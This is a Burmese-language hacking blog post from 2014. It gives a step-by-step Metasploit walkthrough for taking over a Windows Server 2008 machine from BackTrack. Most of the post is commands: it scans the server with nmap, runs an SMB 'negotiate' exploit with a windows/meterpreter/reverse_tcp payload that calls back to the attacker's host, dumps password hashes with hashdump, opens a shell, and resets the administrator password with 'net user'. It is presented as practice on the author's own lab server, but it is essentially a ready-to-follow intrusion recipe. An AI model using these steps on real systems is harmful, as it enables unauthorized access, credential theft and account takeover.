Windows Server 2008 password ကို backtrack ကေနခ်ိန္းမယ္ ~ ေမာင္မင္းလူကေလး(နည္းပညာ)

Saturday, March 22, 2014

Windows Server 2008 password ကို backtrack ကေနခ်ိန္းမယ္

2:01 AM Computer နည္းပညာ, Hacking, Networking No comments

သူငယ္ခ်င္းတို႔ေရ...... intro ေတြမ၀င္ေနေတာ႔ပါဘူးဗ်ာ....လက္ေတြ႕ေလးေတြနဲ႔စလိုက္ရေအာင္ေနာ္...
ဒါေလးကေတာ႔ windows server ထဲမွာ ကြ်န္ေတာ္ password ခ်ိန္းထားတာေလးပါ ဘာမွန္းေတာင္ မမွတ္မိေတာ႔ပါဘူးဗ်....ပံုေလးကို ၾကည့္လိုက္ေတာ႔ေနာ္

ဒါကေတာ႔ backtrack မွာ ping ျပန္ပီး...
nmap 192.168.208.3(server ipျဖစ္ပါတယ္)ရိုက္ပါတယ္

ခဏေစာင္႔ပီး

msfconsole ရိုက္ပါတယ္

msf နဲ႔၀င္သြားတဲ႔အခါမွာ..
search negotiate ဆက္ရိုက္ပါတယ္

exploitေနာက္က ဘာျဖစ္တယ္ညာျဖစ္တယ္ဆိုပီး search negotiate ရိုက္ရင္ ေပၚလာမဲ႔
စာေတြထဲက exploit ကေန index ထိ copy ကူးပီး
use ေနာက္မွာ အဲ႔စာသားကို paste လုပ္ပါ

ပီးရင္ show options ရိုက္ပါ

ပီးရင္ ပံုထဲက ျပထားတဲ႔အတိုင္း
set RHOST 192.168.208.3(server ip)ရိုက္ပီး enter ေခါက္
set PAYLOAD windows/meterpreter/reverse_tcp ရိုက္ enter ေခါက္

ပီးရင္ show options ထပ္ရိုက္

ပီးရင္ set LHOST 192.168.208.2(backtrack ip)ရိုက္ enter ေခါက္
ပီးရင္ exploit ရုိက္

exploit ရိုက္ပီးလို႔ ခဏေစာင္႔ပီး..meterpreter ဆိုပီးေပၚလာရင္ေတာ႔ထသာခုန္လ ိုက္ပါေတာ႔ဗ်ာ..
meterpreter ေပၚလာရင္ hashdump ဆိုပီးရိုက္....hash code ေလးေတြၾကည့္တာေပါ႔ေနာ္

ပီးရင္ shell ရိုက္လိုက္တာနဲ႔ windows command ေတြ အကုန္သံုးလို႔ရပါပီ

ပီးရင္ ေတာ႔ net user ေနာက္က server ရဲ႕ username နဲ႔ ကိုယ္ထားခ်င္တဲ႔ password ကို
ရိုက္လိုက္ေပါ႔ဒီမွာေတာ႔ကြ်န္ေတာ္က net user administrator kmdP@ssword ဆိုပီး
ရိုက္လိုက္တယ္...ပီးရင္ေတာ႔ successfully ေပၚလာပီဆိုserver ရဲ႕ passwordကို ခ်ိန္းပီးပါပီဗ်ာ..

ဒါကေတာ႔ password ခ်ိန္းပီးတဲ႔ေနာက္ပိုင္းပံုေလးေတြပါ....

ဒီတြင္ၿပီးဆံုးပါပီ ကိုယ္စိတ္ႏွစ္ျဖာ ရႊင္လန္းခ်မ္းေျမ႕ၾကပါေစဗ်ာ..

အမွားအယြင္းမ်ားပါခဲ႔ရင္ ခြင္႔လႊတ္ပါခင္ဗ်ာ...
MgminLukaLay
ဒါေလးက ကြ်န္ေတာ႔ေနရာ

ေမာင္မင္းလူကေလး(နည္းပညာ)

About

Saturday, March 22, 2014